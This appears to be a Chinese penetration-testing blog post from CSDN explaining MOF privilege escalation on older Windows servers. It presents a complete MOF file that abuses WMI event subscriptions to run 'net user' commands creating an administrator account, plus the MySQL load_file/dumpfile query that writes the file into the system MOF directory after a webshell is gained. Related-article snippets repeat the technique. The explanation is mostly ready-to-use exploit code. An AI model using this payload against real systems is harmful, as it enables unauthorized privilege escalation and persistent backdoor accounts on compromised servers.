mof提权

最新推荐文章于 2022-03-31 23:01:58 发布
最新推荐文章于 2022-03-31 23:01:58 发布
阅读量533 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq115399231/article/details/96176747
版权

原理

利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。
对windows版本有所要求:
仅限windows server2008以下的版本

mof提权代码

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net user admin admin /add\")";
};

instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};

再将命令换为net localgroup administrators admin /add即可得到administrator用户admin
原理简单,在什么时候使用mof提权呢?
拿下webshell之后当前权限仅限于对网站文件的操作,想要获取对主机的操作还需进一步提权
我们可以将此mof文件上传到网站目录,通过mysql的outfile操作拷贝到服务器的c:/windows/system32/wbem/mof/目录下来执行命令
select load_file('C:/wwwroot/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'

爱玩爱睡爱学习
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql mof提权原理_[原创]WEB安全第六章提权篇12 mof提权
weixin_30631569的博客
02-26 261
WEB安全第六章提权篇12 mof提权1、mof是什么托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译。编译 MOF 文件将在 CIM 储存库中注册所有的类定义和实例。之后,提供程序、事件类别和事件信息便可由 便可由 WMI 和 Visual Studio Analyzer 使用。 在 MOF 文件中创建提供...
MySQL提权mof提权
2301_77300311的博客
04-11 534
关于 mof 提权的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。MOF文件每五秒就会执行,而且是系统权限,我们通过mysql使用load_file 将文件写入/wbme/mof,然后系统每隔五秒就会执行一次我们上传的MOF。我们提权成功后,就算被删号,mof也会在五秒内将原账号重建,那么这给我们退出测试造成了很大的困扰,所以谨慎使用。
[WEB安全]MySQl提权 mof、udf过程详解
网络安全知识分享
12-17 3169
MySQL提权〇、Mysql提权的必备条件1、Mysql密码查询2、利用ntfs特性创建文件夹3、常用的sql基础查询命令一、mof提权0、环境搭建1、原理2、条件3、开始4、删号二、UDF提权0、原理1、步骤2、实操 〇、Mysql提权的必备条件 Mysql的服务没有降权,并且需要获取Mysql root账号密码 使用net user命令查看系统当前帐号,如果出现Mysql这类用户,则系统可能进行了降权 1、Mysql密码查询 1、root密码查询 # MySQL <= 5.6 版本 selec
Windows提权之第三方组件mysql提权(mof)
mrx56的博客
03-31 3760
为什么要提权? 答:因为webshell的权限一般是继承中间件的权限,此时就需要提高到系统管理员权限才方便进一步渗透。一般java中间件运行权限最高。 Windows提权常用命令 内置组: Administrators(管理员组) Guests (来宾组,权限最低,默认禁止) Users(新建用户组) net user 查看所有用户信息 net user + 用户名 查看此用户信息 net user + 用户名 /del 删除此用户 net user + 用户名+密码 /add 添加用户 net loca
内网渗透之——mysql数据库提权之——MOF提权
wsnbbz的博客
03-11 965
前题 只能在windows使用,应用范围:2008以下的系统,Mysql5.7以下(--secure_file_prive:此配置写文件不限制) 介绍 mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡 条件 mysql服务器配置允许root用户远程连接 ...
mof提权文件nullevt.mof
03-12
mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的...
Mysql UDF、MOF、反链端口提权.zip
12-14
Mysql UDF、MOF、反链端口提权
MOF_V2.5.1
07-13
MOF_V2.5.1
dnsetw.mof
11-14
《dnsetw.mof:Windows 2003 DNS服务配置的关键》 在Windows Server 2003操作系统中,DNS(Domain Name System)服务扮演着至关重要的角色,它负责将域名转换为IP地址,使网络通信得以顺畅进行。在安装或配置DNS...
mof 设计与开发
09-20
Conjugated organic framework with three-dimensionally ordered stable structure and delocalized π clouds(2)
UDF提权MOF提权
Armandhe的博客
06-05 1059
让我们来康康mysql提权的两种常见姿势!!!!!!!!!!!!!!!!
mysql mof提权原理_mof提权原理及其过程
weixin_39533742的博客
02-01 286
mof提权的原理:mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员...
MOF手工提权辅助
信安路上……
03-18 312
MOF手工提权辅助: #pragma namespace("\\.\root\subscription") instance of __EventFilter as { EventNamespace = "Root\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationE...
mysql之mof提权
Clannad的博客
11-17 481
文章目录靶机 Server 2003use exploit/windows/mysql/mysql_mof查看需要配置的参数配置参数输入 run 或者 exploit 来执行成功拿到meterpreter回显之后,输入shell,拿下shell开启和关闭3389端口 靶机 Server 2003 use exploit/windows/mysql/mysql_mof 使用use 来调用此模块 记...
mof格式的文件怎么打开?用什么工具?
weixin_30900589的博客
02-29 521
托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译。有关更多信息,请参见编译托管对象格式 (MOF) 文件。编译 MOF 文件将在 CIM 储存库中注册所有的类定义和实例。之后,提供程序、事件类别和事件信息便可由 WMI 和 Visual Studio Analyzer 使用。在 MOF 文件中创建提供程...
文件系统驱动编程基础篇之4——Wmi管理规范 mof文件
尘埃落定
08-11 5467
二、WMI简介  一)基于Web的企业管理(Web-Based Enterprise Management (WBEM))的提出是为了解决企业在快速发展的过程中,总成本(Total costof ownership(TCO))也随之快速增长的矛盾,它作为一项业界倡议,起始于1996年,规范了企业网络中受管资源的描述与使用。WBEM建立在通用信息模型(CommonInform
linux mysql mof提权,mysql提权mof提权
weixin_39970823的博客
05-10 90
拿下webshell之后当前权限仅限于对网站文件的操作,想要获取对主机的操作还需进一步提权首先介绍mof提权,直接案例演示找一个可写目录上传mof文件,我这里上传到了 C:/wmpub/nullevt.mof 代码如下#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter{Eve...
mysql mof 提权
最新发布
05-31
MySQL服务器中的MOF提权漏洞是由于MySQL服务器使用了WMI(Windows Management Instrumentation)组件,而WMI组件中存在漏洞导致的。 攻击者可以利用MOF提权漏洞来执行任意代码,从而完全控制MySQL服务器。具体来说...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值